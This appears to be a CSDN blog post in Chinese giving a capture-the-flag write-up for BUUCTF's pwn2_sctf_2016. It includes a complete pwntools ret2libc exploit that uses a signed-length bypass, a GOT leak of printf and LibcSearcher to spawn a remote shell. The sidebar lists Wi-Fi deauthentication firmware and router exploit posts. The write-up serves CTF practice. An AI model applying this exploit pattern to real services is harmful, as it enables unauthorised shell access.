BUUCTF-pwn2_sctf_2016

最新推荐文章于 2024-04-24 15:47:54 发布
最新推荐文章于 2024-04-24 15:47:54 发布
阅读量79 收藏
点赞数
分类专栏: BUUCTF 文章标签: 算法 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/127732824
版权

1.chwcksec

2.IDA

无符号Int,输入-1进行溢出 ,绕过长度限制

利用printf函数泄露libc,利用system('bin/sh') 

3.EXP

from pwn import *
from LibcSearcher import *

r=remote("node4.buuoj.cn",27523)
elf=ELF('./pwn2_sctf_2016')

printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
main=elf.sym['main']

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(printf_plt)+p32(main)+p32(printf_got)
r.sendline(payload)
r.recvuntil('\n')
printf_addr=u32(r.recv(4))
libc=LibcSearcher('printf',printf_addr)

offset=printf_addr-libc.dump('printf')
system=offset+libc.dump('system')
bin_sh=offset+libc.dump('str_bin_sh')

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
payload='a'*(0x2c+4)+p32(system)+p32(main)+p32(bin_sh)
r.sendline(payload)

r.interactive()

在读入的时候输入-1,具体交互

Rt1Text
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF pwn2_sctf2016
红叶的博客
11-01 460
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 289
BUUCTF 做题练习
buuctf pwn1_sctf_2016
wp568的博客
10-05 184
看到有.‘rodata:0000000000400684 00000008 C /bin/sh’,点进去看。read()并没有限制输入,显然存在栈溢出漏洞。存在后门函数,函数起始位置400596。拖入IDA,shift+F12查看。
BUUCTF Pwn pwn2_sctf_2016
m0_67392273的博客
03-15 293
BUUCTF Pwn pwn2_sctf_2016 1.checksec 2.IDA32 vuln函数 漏洞利用 3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you wan
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
Java | Leetcode Java题解之第35题搜索插入位置
m0_57195758的博客
04-18 444
Java | Leetcode Java题解之第35题搜索插入位置
DFS与回溯专题:路径总和问题
孤舟一叶~的博客
04-19 753
对二叉树进行dfs搜索,递归计算每条路径的节点值之和,当某个节点的左右子节点都为空时,说明已经搜索完成某一条路径,将它与目标值进行比较,若相等,则为true。路径恢复: 向上回溯前,需要将当前节点从路径 list 中删除,即执行list.remove(list.size() - 1)。为什么要写list_all.add(new ArrayList(list)),而不是list_all.add(list)?注意:解释里面的sum.add(path)就是list_all.add(list)
算法训练营day21
wugong_true的博客
04-23 239
接下来,根据计数count与最大计数maxCount的比较,更新众数的结果数组resList和最大计数maxCount。如果count大于maxCount,则清空resList并将当前节点值添加进去,并更新maxCount为count;接着,根据resList中的众数,创建一个整型数组res,并将其返回作为结果。然后,通过与前一个节点的值进行比较,判断当前节点值出现的次数。如果当前节点与前一个节点的值不同,说明出现了一个新的值,将计数count重置为1;,计算相邻两个元素的差值,并将较小的差值更新到。
力扣136. 只出现一次的数字
LNsupermali的博客
04-18 561
力扣136. 只出现一次的数字
算法基础】第五章:动态规划
最新发布
m0_65787507的博客
04-24 395
DP:【1】状态表示:需要几个维度来表示状态(1)集合(所有选法,带有约束条件)(2)属性(最大值、最小值、数量)【2】状态计算:如何算出每一步的状态,对应集合的划分(不重+不漏)**DP的优化:**对代码/计算方程做变形。
视频质量评价 BRISQUE算法详细介绍
小金牛来了
04-21 37
视频质量评价 BRISQUE算法详细介绍
【错题集-编程题】数组中的最长连续子序列(排序 + 模拟)
Elena's Blog
04-24 203
因为题目不要求位置连续,那么就可以直接想到排序(我把这一块理解错了,导致没有排序去做),接着就是简单的模拟。,然而实际上这道题目要求的是。小心处理数字相同的情况。
代码随想录算法训练营day44
Mitakiyuki的博客
04-18 201
完全背包和01背包的区别就是物品可以重复无限使用,因此二层循环要变为正序。
LeetCode //C - 18. 4Sum
Made in Code
04-22 687
【代码】LeetCode //C - 18. 4Sum。
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值